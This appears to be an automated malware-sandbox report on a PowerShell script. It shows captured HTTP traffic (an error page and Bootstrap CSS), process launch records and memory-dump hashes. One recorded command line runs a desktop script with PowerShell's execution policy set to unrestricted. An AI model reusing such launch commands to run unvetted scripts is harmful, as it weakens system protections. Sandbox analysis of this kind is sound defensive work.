                                                2025-02-18 07:26:01 UTC844INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69
                                                Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# si
                                                2025-02-18 07:26:01 UTC1613INData Raw: 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a
                                                Data Ascii: } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 104.18.11.207 | 443 | 7236 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-18 07:26:02 UTC | 344 | OUT | GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-CH
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                Host: maxcdn.bootstrapcdn.com
                                                Connection: Keep-Alive
2025-02-18 07:26:02 UTC | 952 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 18 Feb 2025 07:26:02 GMT
                                                Content-Type: text/css; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CDN-PullZone: 252412
                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                CDN-RequestCountryCode: US
                                                Vary: Accept-Encoding
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=31919000
                                                ETag: W/"ec3bb52a00e176a7181d454dffaea219"
                                                Last-Modified: Mon, 25 Jan 2021 22:03:59 GMT
                                                CDN-ProxyVer: 1.06
                                                CDN-RequestPullSuccess: True
                                                CDN-RequestPullCode: 200
                                                CDN-CachedAt: 12/24/2024 11:48:40
                                                CDN-EdgeStorageId: 718
                                                timing-allow-origin: *
                                                cross-origin-resource-policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                CDN-Status: 200
                                                CDN-RequestTime: 0
                                                CDN-RequestId: e6a91a8b3f8912bc7b5ad8b75eed4780
                                                CDN-Cache: HIT
                                                CF-Cache-Status: HIT
                                                Age: 2070044
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Server: cloudflare
                                                CF-RAY: 913c49621aef43da-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: \e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyph
                                                2025-02-18 07:26:02 UTC1369INData Raw: 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 68 65 69
                                                Data Ascii: con-bookmark:before{content:"\e044"}.glyphicon-print:before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-hei
                                                2025-02-18 07:26:02 UTC1369INData Raw: 70 68 69 63 6f 6e 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 6c 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 69 6e 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                Data Ascii: phicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{cont
                                                2025-02-18 07:26:02 UTC1369INData Raw: 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 74 77 65 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                Data Ascii: "}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{cont
                                                2025-02-18 07:26:02 UTC1369INData Raw: 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 61 70 65 72 63 6c 69 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 65 61 72 74 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 75 73 68 70 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 75 73 64 3a 62 65 66
                                                Data Ascii: rd:before{content:"\e141"}.glyphicon-paperclip:before{content:"\e142"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-pushpin:before{content:"\e146"}.glyphicon-usd:bef
                                                2025-02-18 07:26:02 UTC1369INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 73 61 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 72 65 64 69 74 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 72 61 6e 73 66 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 38 22 7d 2e 67 6c 79 70 68 69
                                                Data Ascii: re{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphi



                                                Target ID:0
                                                Start time:02:25:55
                                                Start date:18/02/2025
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
                                                Imagebase:0xf0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:1
                                                Start time:02:25:55
                                                Start date:18/02/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:02:25:56
                                                Start date:18/02/2025
                                                Path:C:\Windows\System32\notepad.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
                                                Imagebase:0x7ff711430000
                                                File size:201'216 bytes
                                                MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7976fb41bfac9bd6d36dc10afc423baf1e800ef28999b7d78cb534d5c6b44e0
                                                  • Instruction ID: 0f9729d61918b0ba3b8c71f0123a06cd709f153ee3eb4a9da0eeef902796389b
                                                  • Opcode Fuzzy Hash: f7976fb41bfac9bd6d36dc10afc423baf1e800ef28999b7d78cb534d5c6b44e0
                                                  • Instruction Fuzzy Hash: 8D41F130B002049FEB14DB75C4657AEBAF7EFCC210F18C469D806AB795DB75AC429B61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ad760d48ead858d04343066a82ff3e38d75835fdd208f2dd0410e519f3293a7
                                                  • Instruction ID: e313a64e3e9b02527f3ccb31b7456f2cb2a60932175b00a51a3686465f7df0d6
                                                  • Opcode Fuzzy Hash: 8ad760d48ead858d04343066a82ff3e38d75835fdd208f2dd0410e519f3293a7
                                                  • Instruction Fuzzy Hash: 1441E1F0B002028FEB298F3485527FA7BB2FF95604F1984E9E9159B391D732D951C7A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8589a7460813fc5fc42f7f645a37643e22bb873db82731506e3bf9d2c1937ecc
                                                  • Instruction ID: bac17865db49dfae0e65dc53364b9fc836b5958c21c399c9c390fa0dd44459d8
                                                  • Opcode Fuzzy Hash: 8589a7460813fc5fc42f7f645a37643e22bb873db82731506e3bf9d2c1937ecc
                                                  • Instruction Fuzzy Hash: A6413774A00605AFCB19CF58C4A4EAAF7B1FF48310B158569D816AB3A4C736FC91CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d953ac761d979cefe01a02f97873a7abf6ed4d4c4ea56888980f9911fe6e397
                                                  • Instruction ID: 71f361a8f94860e574b413e7e109e88a616925fac6dd4d5a116ba1cf336cdbf6
                                                  • Opcode Fuzzy Hash: 4d953ac761d979cefe01a02f97873a7abf6ed4d4c4ea56888980f9911fe6e397
                                                  • Instruction Fuzzy Hash: 2741E276D012489FDB18DFEAE944BDEBBF6AF48310F24802AE415B7250DB74A945CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ba728fbcf0ab1d0dfdc21d08635d6af54d641ecfd2aa7fec82d66fd240e2051
                                                  • Instruction ID: 53ac37723511dc6209d1567ec8cd991e0ed0deef8df2d6e1bf72be7b1879f95e
                                                  • Opcode Fuzzy Hash: 7ba728fbcf0ab1d0dfdc21d08635d6af54d641ecfd2aa7fec82d66fd240e2051
                                                  • Instruction Fuzzy Hash: 174105B2D002489FDB18CFAAD944ADEFBF5AF48310F10802AE515B7254EB34A945CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3729dc0c76ec7f9ab435f7314d4c3126b0113c4734bdf6b8af4c2f687e56bab3
                                                  • Instruction ID: dc798a85ffdc7b4b1294d6b2eac5eab2124c8791ae97adcd0e8f03377b3f65d6
                                                  • Opcode Fuzzy Hash: 3729dc0c76ec7f9ab435f7314d4c3126b0113c4734bdf6b8af4c2f687e56bab3
                                                  • Instruction Fuzzy Hash: 443143B2D053899FDB28CFA9C8547DEBFF1AF48300F10842AD415AB250EB385946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b7815410ef4fdfff49d03c5f7c756cf4af1766d1376ee5c4107983bb59fe765
                                                  • Instruction ID: be879f17fa028ae62111bffaba64ce5e181baa712568f09337132bac76c8c368
                                                  • Opcode Fuzzy Hash: 1b7815410ef4fdfff49d03c5f7c756cf4af1766d1376ee5c4107983bb59fe765
                                                  • Instruction Fuzzy Hash: 212127F1B04305AFEB115B2498217BA7FA29F42604F0980EBD810CB7C2E735D941D7A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 251e577a4c3e865bca04217d9efed57faa06fbb291eab4d05aaf3724c7b41ce1
                                                  • Instruction ID: d55505c395f0639455f56a40661c4203e64c43a3282ba0a8bdbd75c410772c1f
                                                  • Opcode Fuzzy Hash: 251e577a4c3e865bca04217d9efed57faa06fbb291eab4d05aaf3724c7b41ce1
                                                  • Instruction Fuzzy Hash: D23101B2D002489FDB28CFAAC955BDEBFF6AF48300F14802ED415AB250EB359946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 969d3dcccea97f916ffffac540ea07583941fa5c1ecccd287f37961923632354
                                                  • Instruction ID: d29fea06398baf33fb3c580799cbf712156659e4304344c5c04f1d79b8999041
                                                  • Opcode Fuzzy Hash: 969d3dcccea97f916ffffac540ea07583941fa5c1ecccd287f37961923632354
                                                  • Instruction Fuzzy Hash: 293103B6D152589FDB14CFA9D884BDEBBF5AF48310F24802AE515B7240CB78A845CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab3fba7bc1f901090fa2465fe9cfec19f881717586df123203f61327028c172f
                                                  • Instruction ID: 1ba70c3797ef47897bbd3e62ed54e945a7ba0440d0ad4e2a3fec5700d0ead4de
                                                  • Opcode Fuzzy Hash: ab3fba7bc1f901090fa2465fe9cfec19f881717586df123203f61327028c172f
                                                  • Instruction Fuzzy Hash: 35210671604304DFDF05DF10D9C4B26BBA5FB88314F24C5AEE9498E296C736E856CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62e768b66a4f1fb9085ad39b0a391f93c2cc30af64b2b6d2b1df55fdd39d74c6
                                                  • Instruction ID: 362c6459a188867921e572cb5eb4ae83a7f56a9a6fe6fed408128b8b76b853cf
                                                  • Opcode Fuzzy Hash: 62e768b66a4f1fb9085ad39b0a391f93c2cc30af64b2b6d2b1df55fdd39d74c6
                                                  • Instruction Fuzzy Hash: 73113AB4A042099FCB00DF98D4819AEFBF1FF89310B158199E819EB351C335ED41CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2af9c9ea477a083af87f96385403baa4e5001dbd8c9e6086a07978c3fca66d4
                                                  • Instruction ID: 95ff3da7c832d7023d00a673a602d8f5ed0c36c77c6c2722a62b156bc27d75b9
                                                  • Opcode Fuzzy Hash: a2af9c9ea477a083af87f96385403baa4e5001dbd8c9e6086a07978c3fca66d4
                                                  • Instruction Fuzzy Hash: BF219D76504240DFCF06CF50D9C4B16BFA2FB48314F24C5AAE9494A696C33AE86ACF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d7677375a9254a45a86de37ea65dbf1821a38bf135973af334e5ff378a5e33f
                                                  • Instruction ID: cf235195f8e4672e0c782a41a20e409f7b4e0650e370c109e99778cfb458731c
                                                  • Opcode Fuzzy Hash: 8d7677375a9254a45a86de37ea65dbf1821a38bf135973af334e5ff378a5e33f
                                                  • Instruction Fuzzy Hash: 8701D431604304AAEB204A11EC84B66BFC9EB41225F18C519DC4C8B282D679AC46CAB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346193214.0000000004D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D9D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4d9d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5b8491a57e4c9a7ad76a58a50fd8ea5155a6ac4b287821004bfd9f3481d60f5
                                                  • Instruction ID: 1547902d92a2d89c7eadf5af6152a13045cf88045da2a8500cb9d41c54016cbd
                                                  • Opcode Fuzzy Hash: d5b8491a57e4c9a7ad76a58a50fd8ea5155a6ac4b287821004bfd9f3481d60f5
                                                  • Instruction Fuzzy Hash: 2B015E6114E3C09FD7128B259C94B52BFB4EF43224F19C1DBD8888F2A3C2699C49CB72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8227332d9d9f65ebe66906cfa949722d28dded2eac61bb38c257f9ee77a962e0
                                                  • Instruction ID: f097ad6ff30c710cd7a4c6918547d6f3ea6165bb4d3de726acaf044e3e28d66c
                                                  • Opcode Fuzzy Hash: 8227332d9d9f65ebe66906cfa949722d28dded2eac61bb38c257f9ee77a962e0
                                                  • Instruction Fuzzy Hash: 3601D6397101148FC746B738A12857D7BA3DFC9655716456EE807C7782DF788D038B51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbe04dc4c329e61e2e1382e79bbe53515cd134268a369c624832c69f0b4e99b3
                                                  • Instruction ID: 85850a6af842434209a131b7d3ddeb62de618107ca18082be76b03f95a1ebb08
                                                  • Opcode Fuzzy Hash: fbe04dc4c329e61e2e1382e79bbe53515cd134268a369c624832c69f0b4e99b3
                                                  • Instruction Fuzzy Hash: C6F0F0357043005BDF246A69A42466F77ABFBC9221B04463ED40ECB380EF71AC8A83D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6baad68f4722f0e738ed48d95b481aa6ad9ea1011619f74e683e2aac267fdcbd
                                                  • Instruction ID: 6a84cac0d630c76349defbcb6e15d7b4269f1b1d0e58e5f718273b405eb38cbe
                                                  • Opcode Fuzzy Hash: 6baad68f4722f0e738ed48d95b481aa6ad9ea1011619f74e683e2aac267fdcbd
                                                  • Instruction Fuzzy Hash: 43F027367093500FDB22527D60545EE7F66EBCA220308027FD00ECB782DA615D4A83A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc3967e2283ac672e253c70281c00953a23968536da7c61b0faa3d8ae0e89c91
                                                  • Instruction ID: fd611ab405e6ed209eeeec067f35f0220f16315ed809eb503adc89770951933b
                                                  • Opcode Fuzzy Hash: bc3967e2283ac672e253c70281c00953a23968536da7c61b0faa3d8ae0e89c91
                                                  • Instruction Fuzzy Hash: 63F030397105189F8749BB38A26843E77E7EFCC666316442EE90BC7381DF749E028B91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
